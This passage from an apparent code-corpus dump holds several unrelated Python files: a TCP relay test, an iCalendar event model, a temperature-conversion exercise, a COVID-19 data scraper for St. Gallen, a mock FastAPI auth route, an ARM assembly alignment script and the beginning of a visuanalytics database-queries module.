inputs = andino_tcp.x1_instance.io.input_pins
relays = andino_tcp.x1_instance.io.relay_pins
client = TcpClient('localhost', port, )
andino_tcp.start()
client.connect()
try:
expect = "REL? 1\n"
client.send(expect)
receive = client.receive_message()
self.assertEqual(expect, receive)
# Relay pulsing working?
for i in range(len(relays)):
message = f"RPU{i + 1} 5000\n"
client.send(message)
time.sleep(0.2)
# self.assertEqual(andino_tcp.x1_instance.io.outRel[i].value, 1)
receive = client.receive_message()
self.assertEqual(message, receive)
receive = client.receive_message()
self.assertTrue(receive.endswith("{1,1,1}\n"))
time.sleep(andino_tcp.tcpserver.broadcast_timer)
receive = client.receive_message()
self.assertTrue(receive.endswith("{0,0,0}\n"))
finally:
andino_tcp.stop()
client.stop()
def test_files(self):
directory = os.path.dirname(__file__)
for folder in os.listdir(directory):
folder_path = os.path.join(directory, folder)
if os.path.isdir(folder_path):
with self.subTest(folder):
in_path = os.path.join(folder_path, "out.txt")
out_path = os.path.join(folder_path, "in.txt")
self.assertTrue(os.path.isfile(in_path))
self.assertTrue(os.path.isfile(out_path))
in_file = open(in_path, "r")
out_file = open(out_path, "r")
try:
result = self.exec_test(in_file.read())
expected = out_file.read().splitlines()
self.assertEqual(expected, result)
finally:
in_file.close()
out_file.close()
def exec_test(self, input_file):
port = self.port_number
self.port_number += 1
if not sys.platform.startswith("linux"):
import gpiozero
from gpiozero.pins.mock import MockFactory
gpiozero.Device.pin_factory = MockFactory()
andino_tcp = andinopy.tcp.andino_tcp.andino_tcp("io", port)
client = TcpClient('localhost', port, )
output = []
def receive_answer(recv_client):
rec: List[str] = recv_client.receive_message().splitlines()
for i in rec:
if not i.startswith(":"):
return i
return receive_answer(recv_client)
try:
andino_tcp.start()
client.connect()
lines = input_file.splitlines()
for line in lines:
if line: # ignore empty lines
client.send(line)
output.append(receive_answer(client))
finally:
andino_tcp.stop()
client.stop()
return output
| 35.144928 | 94 | 0.559072 |
145bf8f33506af3436b279951420b57309f70547
| 1,881 |
py
|
Python
|
src/onegov/event/models/occurrence.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/event/models/occurrence.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/event/models/occurrence.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from icalendar import Calendar as vCalendar
from icalendar import Event as vEvent
from onegov.core.orm import Base
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm.types import UUID
from onegov.event.models.mixins import OccurrenceMixin
from pytz import UTC
from sedate import to_timezone
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from uuid import uuid4
class Occurrence(Base, OccurrenceMixin, TimestampMixin):
""" Defines an occurrence of an event. """
__tablename__ = 'event_occurrences'
    #: Internal number of the occurrence
id = Column(UUID, primary_key=True, default=uuid4)
#: Event this occurrence belongs to
event_id = Column(UUID, ForeignKey('events.id'), nullable=False)
def as_ical(self, url=None):
""" Returns the occurrence as iCalendar string. """
modified = self.modified or self.created or datetime.utcnow()
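        # The rest of this method wraps a single vEvent in a vCalendar; the serialized result is a
        # bytes object in iCalendar format, roughly b"BEGIN:VCALENDAR...BEGIN:VEVENT...END:VCALENDAR\r\n"
        # (illustrative only, exact folding and ordering are up to the icalendar library).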
event = self.event
vevent = vEvent()
vevent.add('uid', f'{self.name}@onegov.event')
vevent.add('summary', self.title)
vevent.add('dtstart', to_timezone(self.start, UTC))
vevent.add('dtend', to_timezone(self.end, UTC))
vevent.add('last-modified', modified)
vevent.add('dtstamp', modified)
vevent.add('location', self.location)
vevent.add('description', event.description)
vevent.add('categories', event.tags)
if event.coordinates:
vevent.add('geo', (event.coordinates.lat, event.coordinates.lon))
if url:
vevent.add('url', url)
vcalendar = vCalendar()
vcalendar.add('prodid', '-//OneGov//onegov.event//')
vcalendar.add('version', '2.0')
vcalendar.add_component(vevent)
return vcalendar.to_ical()
@property
def access(self):
return self.event.access
| 33.589286 | 77 | 0.679957 |
148cf3455ad4b2a5da7b6d2039c42f57a3fd5de9
| 769 |
py
|
Python
|
___Python/Thomas/pycurs_180625/p02_datenstrukturen/m01_temperatur.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
___Python/Thomas/pycurs_180625/p02_datenstrukturen/m01_temperatur.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
___Python/Thomas/pycurs_180625/p02_datenstrukturen/m01_temperatur.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
celsius = [0.7, 2.1, 4.2, 8.2, 12.5, 15.6, 16.9, 16.3, 13.6, 9.5, 4.6, 2.3]  # average monthly temperatures in Bielefeld
# Build the list of Fahrenheit values (for loop)
wertefahrenheit = []
for wertecelsius in celsius:
wertefahrenheit.append(round((wertecelsius*1.8)+32, 2)) # F = C*1.8 + 32 C = (F-32)/1.8
print(wertefahrenheit)
# Build the list of Fahrenheit values (list comprehension)
print('Werte Fahrenheit')
wertefahrenheit = [wertecelsius * 1.8 +32 for wertecelsius in celsius]
print(wertefahrenheit)
# Fahrenheit values only for Celsius temperatures >= 15°C
print('Werte Fahrenheit (Celsius>=15°C)')
wertefahrenheit = [wertecelsius* 1.8 +32 for wertecelsius in celsius if wertecelsius >= 15]
print(wertefahrenheit)
| 40.473684 | 111 | 0.715215 |
dce32a847718277eaf7bd48272a69f797dc47f06
| 3,894 |
py
|
Python
|
scrapers/scrape_sg.py
|
AryaVashisht/covid_19
|
0c734615a1190a5b2fff4697f47731ef2b8b6918
|
[
"CC-BY-4.0"
] | null | null | null |
scrapers/scrape_sg.py
|
AryaVashisht/covid_19
|
0c734615a1190a5b2fff4697f47731ef2b8b6918
|
[
"CC-BY-4.0"
] | null | null | null |
scrapers/scrape_sg.py
|
AryaVashisht/covid_19
|
0c734615a1190a5b2fff4697f47731ef2b8b6918
|
[
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/env python3
import csv
from io import StringIO
import re
from bs4 import BeautifulSoup
import scrape_common as sc
# hospitalized
url_hospitalized = 'https://stada.sg.ch/covid/C19_Faelle_hospitalisiert.html'
soup = BeautifulSoup(sc.download(url_hospitalized, silent=True), 'html.parser')
dd_hosp = sc.DayData(canton='SG', url=url_hospitalized)
hosp_table = soup.find('table')
hosp_date = hosp_table.find_next(string=re.compile("Stand")).string
dd_hosp.datetime = sc.find(r'Stand:?\s*(.+[0-9]{4})', hosp_date)
rows = hosp_table.find_all('tr')
headers = rows[0].find_all('td') or rows[0].find_all('th')
assert len(headers) == 2, f"Number of header columns changed, {len(headers)} != 2"
assert headers[1].text.strip() == "Anzahl"
for i in range(1, len(rows)):
cells = rows[i].find_all('td')
if cells[0].text.strip() == 'Total Covid-19 Patienten':
dd_hosp.hospitalized = cells[1].text
elif cells[0].text.strip() == '...davon auf Intensivstation ohne Beatmung':
dd_hosp.icu = int(cells[1].text)
elif cells[0].text.strip() == '...davon auf Intensivstation mit Beatmung':
dd_hosp.vent = int(cells[1].text)
if dd_hosp.vent:
dd_hosp.icu += dd_hosp.vent
print(dd_hosp)
print('-' * 10)
# isolated / quarantined cases
url_isolated = 'https://stada.sg.ch/covid/ContactTracing.html'
soup = BeautifulSoup(sc.download(url_isolated, silent=True), 'html.parser')
dd_isolated = sc.DayData(canton='SG', url=url_isolated)
isolated_table = soup.find('table')
isolated_date = isolated_table.find_next(string=re.compile("Stand")).string
dd_isolated.datetime = sc.find(r'Stand:?\s*(.+[0-9]{4})', isolated_date)
rows = isolated_table.find_all('tr')
headers = rows[0].find_all('td') or rows[0].find_all('th')
assert len(headers) == 2, f"Number of header columns changed, {len(headers)} != 2"
assert headers[1].text.strip() == "Anzahl"
for i in range(1, len(rows)):
cells = rows[i].find_all('td')
if cells[0].text.strip() == 'Positiv Getestete im Tracing / in Isolation':
value = cells[1].text.strip()
if sc.represents_int(value):
dd_isolated.isolated = int(value)
elif cells[0].text.strip() == 'Kontaktpersonen im Tracing / in Quarantäne':
value = cells[1].text.strip()
if sc.represents_int(value):
dd_isolated.quarantined = int(value)
if dd_isolated:
print(dd_isolated)
print('-' * 10)
# historized cases
csv_url = 'https://www.sg.ch/ueber-den-kanton-st-gallen/statistik/covid-19/_jcr_content/Par/sgch_downloadlist/DownloadListPar/sgch_download.ocFile/KantonSG_C19-Faelle_download.csv'
d = sc.download(csv_url, silent=True)
# strip the "header" / description lines
d = "\n".join(d.split("\n")[5:])
reader = csv.DictReader(StringIO(d), delimiter=';')
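# The remaining rows are expected to provide at least the columns accessed below,
# e.g. 'Falldatum' and 'Total Kanton SG (kumuliert)'; any other columns are ignored.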
for row in reader:
dd = sc.DayData(canton='SG', url=csv_url)
dd.datetime = row['Falldatum']
dd.cases = row['Total Kanton SG (kumuliert)']
print(dd)
print('-' * 10)
# latest cases
url_cases = 'https://stada.sg.ch/covid/BAG_uebersicht.html'
soup = BeautifulSoup(sc.download(url_cases, silent=True), 'html.parser')
dd_cases = sc.DayData(canton='SG', url=url_cases)
cases_table = soup.find('table')
hosp_date = cases_table.find_next(string=re.compile("Stand")).string
dd_cases.datetime = sc.find(r'Stand:?\s*(.+[0-9]{4})', hosp_date)
rows = cases_table.find_all('tr')
headers = rows[0].find_all('td') or rows[0].find_all('th')
assert len(headers) == 2, f"Number of header columns changed, {len(headers)} != 2"
assert headers[1].text.strip() == "Anzahl"
for row in rows:
cells = row.find_all('td')
if len(cells) == 2:
if cells[0].text.strip() == 'Laborbestätigte Fälle kumuliert (seit März 2020)':
dd_cases.cases = cells[1].string
elif cells[0].text.strip() == 'Todesfälle kumuliert (seit März 2020)':
dd_cases.deaths = cells[1].string
print(dd_cases)
| 35.4 | 180 | 0.686954 |
b4e026119906125ce08226b14d48784a13373c72
| 568 |
py
|
Python
|
_dev/license-retrival-mock-server/src/routers/auth.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
_dev/license-retrival-mock-server/src/routers/auth.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
_dev/license-retrival-mock-server/src/routers/auth.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
from fastapi import APIRouter, Form
from pydantic import BaseModel
router = APIRouter(prefix="/auth", tags=["Auth"])
class AuthResponse(BaseModel):
""" Response model for get_license_package """
access_token: str
token_type: str
expires_in: int
scope: str
@router.post("", response_model=AuthResponse)
def auth(scope: str = Form(...)):
""" Mock auth endpoint """
return AuthResponse(access_token="dummy_token",
token_type="bearer",
expires_in=28800,
scope=scope)
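# A minimal usage sketch (assuming FastAPI's TestClient; the app wiring below is hypothetical):
#   from fastapi import FastAPI
#   from fastapi.testclient import TestClient
#   app = FastAPI(); app.include_router(router)
#   resp = TestClient(app).post("/auth", data={"scope": "licence"})
#   resp.json()  # -> {"access_token": "dummy_token", "token_type": "bearer", "expires_in": 28800, "scope": "licence"}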
| 25.818182 | 51 | 0.621479 |
d32f2610b782a381e4bd41b423fd3f38295718ca
| 4,294 |
py
|
Python
|
fix-alignment.py
|
Dia-B/polymul-z2mx-m4
|
7b4cde2ba913557f28397b03dfcc7cfaeda06295
|
[
"CC0-1.0"
] | 34 |
2019-02-15T05:11:49.000Z
|
2022-03-23T08:00:29.000Z
|
Cortex-M_Implementation_KEM/Cortex-M4/src/m4-striding/fix-alignment.py
|
cothan/SABER
|
4743134da0e4a695491b6c2de60e17f21d2d241f
|
[
"Unlicense"
] | 8 |
2020-04-09T12:33:42.000Z
|
2022-03-07T20:08:41.000Z
|
Cortex-M_Implementation_KEM/Cortex-M4/src/m4-striding/fix-alignment.py
|
cothan/SABER
|
4743134da0e4a695491b6c2de60e17f21d2d241f
|
[
"Unlicense"
] | 10 |
2020-03-09T15:09:50.000Z
|
2022-03-23T08:00:18.000Z
|
from collections import defaultdict
import sys
import subprocess
import argparse
"""
This script widens ARMv7-M instructions in-place to 32-bit if required.
It will accept two 16 bit instructions on the same 4-byte data line, but will
expand 16 bit instructions to 32 bit if that ensures alignment for subsequent
32 bit instructions. This prevents wasted cycles for misaligned fetches.
Flag -v results in a line of output to stderr per widened instruction.
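For illustration (hypothetical instruction): widening simply appends ".w" to the mnemonic, so a
16-bit "add r1, r2" is emitted as the 32-bit encoding "add.w r1, r2" whenever the following 32-bit
instruction would otherwise start at a misaligned address.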
"""
parser = argparse.ArgumentParser(description='Widen ARMv7-M instructions.')
parser.add_argument('filename', metavar='filename', type=str,
help='the plain assembly file (modified inplace)')
parser.add_argument('--verbose', '-v', action='count',
help='enable output for every widened instruction')
args = parser.parse_args()
funcs = defaultdict(list)
obj = args.filename.replace('.s', '.o')
dump = args.filename.replace('.s', '.dump')
# create an object dump of the assembly file
subprocess.run(["arm-none-eabi-gcc", f"{args.filename}", "-mthumb", "-mcpu=cortex-m4", "-mfloat-abi=hard", "-mfpu=fpv4-sp-d16", "-c", "-o", f"{obj}"], check=True)
subprocess.run(["arm-none-eabi-objdump", "-D", f"{obj}"], stdout=open(dump, 'w'), stderr=subprocess.DEVNULL)
func = None
# parse the functions from the object dump
with open(dump, 'r') as f:
for line in f:
if len(line) >= 10 and line[9] == '<':
func = line[10:-3]
        elif len(line.strip()) == 0:  # blank lines separate functions in the objdump output
            func = None
elif func:
if len(line.split('\t')) >= 3:
address, code, *ins = line.split('\t')
if ins[0] == 'bl':
# grab the function name
ins[1] = ''.join(ins[1].split(' ')[1:])[1:-2]
ins = ' '.join(ins).split(';')[0].strip()
funcs[func].append({'address': int(address[:-1], 16),
'ins': ins, 'width': None})
subprocess.run(["rm", f"{obj}"])
subprocess.run(["rm", f"{dump}"])
for func in funcs:
# get widths of all instructions
for i, ins in enumerate(funcs[func]):
try:
nextins = funcs[func][i+1]
ins['width'] = nextins['address'] - ins['address']
except IndexError:
# we cannot determine the width of the last element, but that does
# not matter; the last bx is always two bytes wide.
break
aligned = True
alignedfuncs = defaultdict(list)
def widen(ins):
if args.verbose:
print(f"Widening '{ins['ins']}' at {hex(ins['address'])}", file=sys.stderr)
ins = ins['ins'].split(" ")
if ins[0][-2:] == '.w':
raise Exception(f"Cannot widen already wide instruction {ins}")
ins[0] += '.w'
return ' '.join(ins)
def can_widen(ins):
# So far this is the only exception we care about
if ins[:3] == 'add' and ins[-2:] == 'sp':
return False
return True
for func in funcs:
for i, ins in enumerate(funcs[func]):
if ins['ins'][:2] == 'bx' or ins['width'] is None:
alignedfuncs[func].append(ins['ins'])
break
else:
nextins = funcs[func][i+1] # nextins exists, since we halt at bx
if ins['width'] == 4 or not can_widen(ins['ins']): # cannot do anything
alignedfuncs[func].append(ins['ins'])
elif nextins['width'] == 2: # delay the decision
aligned = not aligned # flip alignment
alignedfuncs[func].append(ins['ins'])
elif nextins['width'] == 4:
if aligned: # need to stay aligned
alignedfuncs[func].append(widen(ins))
else: # we automatically get aligned
alignedfuncs[func].append(ins['ins'])
aligned = True
func = None
output = []
# take the functions from the object dump and insert them in the asm
with open(args.filename, 'r') as f:
for i, line in enumerate(f):
if not func:
output.append(line.strip())
if ':' in line:
func = line.replace(':', '').strip()
if 'bx lr' in line:
output += alignedfuncs[func]
func = None
with open(args.filename, 'w') as f:
for ins in output:
f.write(ins + '\n')
| 34.910569 | 162 | 0.574057 |
2c9e4d46f2895b2625c441497e08218c5cac4356
| 73,996 |
py
|
Python
|
src/visuanalytics/server/db/queries.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 1 |
2020-11-27T17:26:27.000Z
|
2020-11-27T17:26:27.000Z
|
src/visuanalytics/server/db/queries.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 85 |
2021-01-02T11:38:59.000Z
|
2021-07-26T07:13:47.000Z
|
src/visuanalytics/server/db/queries.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 1 |
2021-04-19T06:50:53.000Z
|
2021-04-19T06:50:53.000Z
|
import json
import os
import shutil
import io
import re
import time
import humps
import copy
from base64 import b64encode, encodebytes
from copy import deepcopy
from PIL import Image
from visuanalytics.server.db import db
from visuanalytics.util.config_manager import get_private, set_private, assert_private_exists
from visuanalytics.analytics.processing.image.matplotlib.diagram import generate_test_diagram
from visuanalytics.util.resources import IMAGES_LOCATION as IL, AUDIO_LOCATION as AL, MEMORY_LOCATION as ML, open_resource, get_datasource_path
from visuanalytics.util.infoprovider_utils import generate_step_transform
INFOPROVIDER_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/infoprovider"))
VIDEOJOB_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/steps"))
DATASOURCE_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/datasources"))
TEMP_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/temp"))
SCENE_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/scenes"))
STEPS_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/steps"))
IMAGE_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources", IL))
AUDIO_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources", AL))
MEMORY_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources", ML))
def get_infoprovider_list():
"""
    Loads all infoproviders.
    :return: list with the name and ID of every infoprovider.
"""
con = db.open_con_f()
res = con.execute("SELECT infoprovider_id, infoprovider_name FROM infoprovider")
return [{"infoprovider_id": row["infoprovider_id"], "infoprovider_name": row["infoprovider_name"]} for row in res]
def update_url_pattern(pattern):
"""
    If the URL passed for a request already contains a query string, it is split up
    so that the parameters can be handed to the request object as a dictionary.
    :param pattern: URL with a query part (http...?...)
    :type pattern: str
    :return: the base URL without the query part, and the parameters as a dictionary
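    Example (hypothetical URL):
        "https://api.example.com/v1/data?key=abc&limit=10"
        -> ("https://api.example.com/v1/data", {"key": "abc", "limit": "10"})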
"""
params = {}
pattern = pattern.split("?")
url = pattern[0]
if len(pattern) > 1:
param_list = pattern[1].split("&")
for param in param_list:
values = param.split("=")
params.update({
values[0]: values[1]
})
return url, params
def insert_infoprovider(infoprovider):
"""
    Inserts a new infoprovider.
    :param infoprovider: a dictionary containing the name of the infoprovider, the schedule, the steps 'diagrams'
                         and 'diagrams_original', and a key 'datasources' holding all datasources.
    :type infoprovider: dict
    :return: indicates whether the insert was successful.
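    Example structure (a rough sketch only, inferred from the keys accessed below; not an
    authoritative schema):
        {
            "infoprovider_name": "...",
            "datasources": [{"datasource_name": "...", "api": {...}, "transform": [...],
                             "calculates": [...], "formulas": [...], "replacements": [...],
                             "historized_data": [...], "storing": [...], "schedule": {...}}],
            "diagrams": {...}, "diagrams_original": {...}, "arrays_used_in_diagrams": [...]
        }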
"""
con = db.open_con_f()
assert_private_exists()
infoprovider_name = infoprovider["infoprovider_name"]
datasources = copy.deepcopy(infoprovider["datasources"])
diagrams = remove_toplevel_key(infoprovider["diagrams"])
diagrams_original = infoprovider["diagrams_original"]
arrays_used_in_diagrams = infoprovider["arrays_used_in_diagrams"]
transform_step = []
    # Prepare the api step object
api_step = {
"type": "request_multiple_custom",
"use_loop_as_key": True,
"steps_value": [],
"requests": []
}
for datasource in datasources:
api_key_name = f"{infoprovider['infoprovider_name']}_{datasource['datasource_name']}_APIKEY" if datasource["api"]["method"] != "noAuth" and datasource["api"]["method"] != "BasicAuth" else None
header, parameter = generate_request_dicts(datasource["api"]["api_info"], datasource["api"]["method"], api_key_name=api_key_name)
url, params = update_url_pattern(datasource["api"]["api_info"]["url_pattern"])
parameter.update(params)
req_data = {
"type": datasource["api"]["api_info"]["type"],
"method": datasource["api"]["api_info"].get("method", "GET"),
"url_pattern": url,
"headers": header,
"params": parameter,
"response_type": datasource["api"]["response_type"]
}
if api_key_name:
req_data.update({"api_key_name": api_key_name})
api_step["steps_value"].append(datasource["datasource_name"])
api_step["requests"].append(req_data)
    # Prepare the transform step
transform_step = []
for datasource in datasources:
transform_step += datasource["transform"]
transform_step += datasource["calculates"]
formulas = copy.deepcopy(datasource["formulas"])
custom_keys = _extract_custom_keys(datasource["calculates"], datasource["formulas"], datasource["replacements"])
transform_step = _generate_transform(_extend_formula_keys(formulas, datasource["datasource_name"], custom_keys), remove_toplevel_key(transform_step))
transform_step += remove_toplevel_key(datasource["replacements"])
datasources_copy = deepcopy(infoprovider["datasources"])
for datasource in datasources_copy:
api_key_name_temp = datasource["api"]["api_info"].get("api_key_name", None)
if api_key_name_temp:
datasource["api"]["api_info"]["api_key_name"] = api_key_name_temp.split("||")[0] + "||"
    # Prepare the JSON for saving
infoprovider_json = {
"name": infoprovider_name,
"api": api_step,
"transform": transform_step,
"images": diagrams,
"run_config": {},
"datasources": datasources_copy,
"diagrams_original": diagrams_original,
"arrays_used_in_diagrams": arrays_used_in_diagrams
}
    # Check whether an infoprovider with the same name already exists
count = con.execute("SELECT COUNT(*) FROM infoprovider WHERE infoprovider_name=?", [infoprovider_name]).fetchone()["COUNT(*)"]
if count > 0:
return False
infoprovider_id = con.execute("INSERT INTO infoprovider (infoprovider_name) VALUES (?)",
[infoprovider_name]).lastrowid
for datasource in datasources:
datasource_name = datasource["datasource_name"]
api_key_name = f"{infoprovider['infoprovider_name']}_{datasource['datasource_name']}_APIKEY" if datasource["api"]["method"] != "noAuth" and datasource["api"]["method"] != "BasicAuth" else None
header, parameter = generate_request_dicts(datasource["api"]["api_info"], datasource["api"]["method"], api_key_name=api_key_name)
url, params = update_url_pattern(datasource["api"]["api_info"]["url_pattern"])
parameter.update(params)
req_data = {
"type": datasource["api"]["api_info"]["type"],
"method": datasource["api"]["api_info"].get("method", "GET"),
"url_pattern": url,
"headers": header,
"params": parameter,
"response_type": datasource["api"]["response_type"]
}
if api_key_name:
req_data.update({"api_key_name": api_key_name})
datasource_api_step = {
"type": "request_multiple_custom",
"use_loop_as_key": True,
"steps_value": [datasource_name],
"requests": [req_data]
}
        # Prepare the datasource object
transform_step = []
transform_step += datasource["transform"]
transform_step += datasource["calculates"]
formulas = copy.deepcopy(datasource["formulas"])
custom_keys = _extract_custom_keys(datasource["calculates"], datasource["formulas"], datasource["replacements"])
transform_step = _generate_transform(_extend_formula_keys(formulas, datasource_name, custom_keys), remove_toplevel_key(transform_step))
transform_step += remove_toplevel_key(datasource["replacements"])
datasource_json = {
"name": datasource_name,
"api": datasource_api_step,
"transform": transform_step,
"storing": _generate_storing(datasource["historized_data"], datasource_name, custom_keys, datasource["storing"]) if datasource["api"]["api_info"]["type"] != "request_memory" else [],
"run_config": {}
}
if len(datasource_json["storing"]) > 0 and datasource["api"]["api_info"]["type"] != "request_memory":
            # Store the historisation schedule for the datasource
schedule_historisation = datasource["schedule"]
schedule_historisation_id = _insert_historisation_schedule(con, schedule_historisation)
            # Store the datasource in the database
con.execute("INSERT INTO datasource (datasource_name, schedule_historisation_id, infoprovider_id)"
" VALUES (?, ?, ?)",
[datasource_name, schedule_historisation_id, infoprovider_id])
# add request memory, if datasource stores data
use_last = get_max_use_last(infoprovider_json["images"])
for storing_config in datasource_json["storing"]:
datasource_json["api"]["steps_value"].append(f"{datasource_json['name']}_{storing_config['key'].replace('_req|', '').replace(datasource_json['name'] + '|','').replace('|', '_')}_HISTORY")
datasource_json["api"]["requests"].append({
"type": "request_memory",
"name": dict(storing_config)["name"],
"memory_folder": infoprovider_name + "_" + datasource_name,
"use_last": use_last,
"alternative": {
"type": "input",
"data": [-1 for _ in range(use_last)]
}
})
else:
con.execute("INSERT INTO datasource (datasource_name, infoprovider_id) VALUES (?, ?)",
[datasource_name, infoprovider_id])
        # Save the datasource JSON to the "/datasources" folder
with open_resource(_get_datasource_path(infoprovider_name.replace(" ", "-") + "_" + datasource_name.replace(" ", "-")), "wt") as f:
json.dump(datasource_json, f)
    # Save the infoprovider JSON to the "/infoproviders" folder
with open_resource(_get_infoprovider_path(infoprovider_name.replace(" ", "-")), "wt") as f:
json.dump(infoprovider_json, f)
con.commit()
for diagram_name, diagram in diagrams.items():
generate_test_diagram(diagram, infoprovider_name=infoprovider_name, diagram_name=diagram_name)
return True
def insert_video_job(video, update=False, job_id=None):
"""
    Inserts or updates a video job.
    If an existing video job is to be updated, the job_id has to be provided.
    :param video: a dictionary containing the configuration of a video job.
    :type video: dict
    :param update: whether an existing video job should be updated.
    :type update: bool
    :param job_id: ID of the already existing video job.
    :type job_id: int
    :return: a boolean status, or an error message (when updating).
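    Concretely (read off the code below): when creating, False is returned on a name clash and True
    on success; when updating, a dict with "err_msg" is returned on failure and None on success.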
"""
con = db.open_con_f()
video_name = video["videojob_name"]
tts_infoprovider_ids = video["tts_ids"]
tts_names = []
infoprovider_names = [infoprovider["infoprovider_name"] for infoprovider in video["selectedInfoprovider"]]
video["audio"] = remove_toplevel_key(video["audio"])
    # Load the names of all infoproviders that are used in TTS
for tts_id in tts_infoprovider_ids:
tts_name = con.execute("SELECT infoprovider_name FROM infoprovider WHERE infoprovider_id=?",
[tts_id]).fetchone()["infoprovider_name"]
if tts_name not in infoprovider_names:
tts_names.append(tts_name)
infoprovider_names += tts_names
count = con.execute("SELECT COUNT(*) FROM job WHERE job_name=?", [video_name]).fetchone()["COUNT(*)"]
if count > 0 and not update:
return False
    # Collect and combine the data of all infoproviders in use
scene_names = [x["sceneName"] for x in video["sceneList"]]
infoprovider_id_list = [list(con.execute("SELECT infoprovider_id FROM scene INNER JOIN scene_uses_infoprovider AS uses ON scene.scene_id = uses.scene_id WHERE scene_name=?", [scene_name])) for scene_name in scene_names]
infoprovider_ids = []
for id in infoprovider_id_list:
infoprovider_ids += id
infoprovider_ids = [x["infoprovider_id"] for x in infoprovider_ids]
infoprovider_file_names = [get_infoprovider_file(id) for id in infoprovider_ids]
infoprovider_names = [get_infoprovider_name(id) for id in infoprovider_ids]
for infoprovider_name, file_name in zip(infoprovider_names, infoprovider_file_names):
with open_resource(file_name, "r") as f:
infoprovider = json.load(f)
datasource_files = [x for x in os.listdir(get_datasource_path("")) if x.startswith(infoprovider_name + "_")]
for file in datasource_files:
with open_resource(_get_datasource_path(file.replace(".json", ""))) as f:
datasource_config = json.load(f)
api_config = video.get("api", None)
if api_config:
video["api"]["steps_value"] += datasource_config["api"]["steps_value"]
video["api"]["requests"] += datasource_config["api"]["requests"]
else:
video["api"] = datasource_config["api"]
transform_config = video.get("transform", None)
if transform_config:
video["transform"] += datasource_config["transform"]
else:
video.update({
"transform": datasource_config["transform"]
})
diagram_config = video.get("diagrams", None)
if diagram_config:
# video["diagrams"] += infoprovider["images"]
video["diagrams"].update(infoprovider["images"])
else:
video.update({
"diagrams": infoprovider["images"]
})
    # Collect and combine the remaining data
images = video.get("images", None)
scene_names = list(map(lambda x: images[x]["key"], list(images.keys())))
scenes = get_scene_list()
scenes = list(filter(lambda x: x["scene_name"] in scene_names, scenes))
scene_ids = list(map(lambda x: x["scene_id"], scenes))
scenes = list(map(lambda x: get_scene(x["scene_id"]), scenes))
for k, v in images.items():
images[k] = list(filter(lambda x: x["name"] == v["key"], scenes))[0]["images"]
video["images"] = images
video["storing"] = []
video["run_config"] = {}
video["presets"] = {}
video["info"] = ""
video["name"] = video_name
schedule = video.get("schedule", None)
delete_schedule = video.get("deleteSchedule", {
"type": "keepCount",
"keepCount": 5
})
if not schedule:
return False if not update else {"err_msg": "could not read schedule from JSON"}
    # Save the new JSON file
with open_resource(_get_videojob_path(video_name.replace(" ", "-")), "wt") as f:
json.dump(video, f)
    # Create / update the job
if not update:
topic_id = add_topic_get_id(video_name, video_name.replace(" ", "-"))
job = {
"jobName": video_name,
"schedule": schedule,
"deleteSchedule": delete_schedule,
"topicValues": [
{
"topicId": topic_id
}
]
}
insert_job(job, config=False)
else:
topic_id = list(filter(lambda x: x["topicName"] == video_name, get_topic_names()))[0]["topicId"]
job = {
"jobName": video_name,
"schedule": schedule,
"deleteSchedule": delete_schedule,
"topicValues": [
{
"topicId": topic_id
}
]
}
update_job(job_id, job, config=False)
    # Update the entries in the job_uses_scene table
job_id = con.execute("SELECT job_id FROM job WHERE job_name=?", [video_name]).fetchone()["job_id"]
con.execute("DELETE FROM job_uses_scene WHERE job_id=?", [job_id])
for scene_id in scene_ids:
con.execute("INSERT INTO job_uses_scene (job_id, scene_id, scene_is_preview) VALUES (?, ?, ?)", [job_id, scene_id, False])
con.commit()
return True if not update else None
def get_videojob(job_id):
"""
    Converts the configuration of a video job back into the format
    that the frontend understands for editing.
    :param job_id: ID of the video job to be returned.
    :type job_id: int
    :return: JSON for the frontend.
"""
job_list = get_job_list()
videojob = list(filter(lambda x: x["jobId"] == job_id, job_list))[0]
with open(_get_videojob_path(videojob["jobName"].replace(" ", "-")), "r") as f:
video_json = json.load(f)
video_json.pop("api", None)
video_json.pop("transform", None)
video_json.pop("storing", None)
video_json.pop("run_config", None)
video_json.pop("presets", None)
video_json.pop("info", None)
video_json.pop("diagrams", None)
return video_json
def show_schedule():
"""
    Loads all entries of the 'schedule_historisation' table.
"""
con = db.open_con_f()
res = con.execute("SELECT schedule_historisation_id, type FROM schedule_historisation")
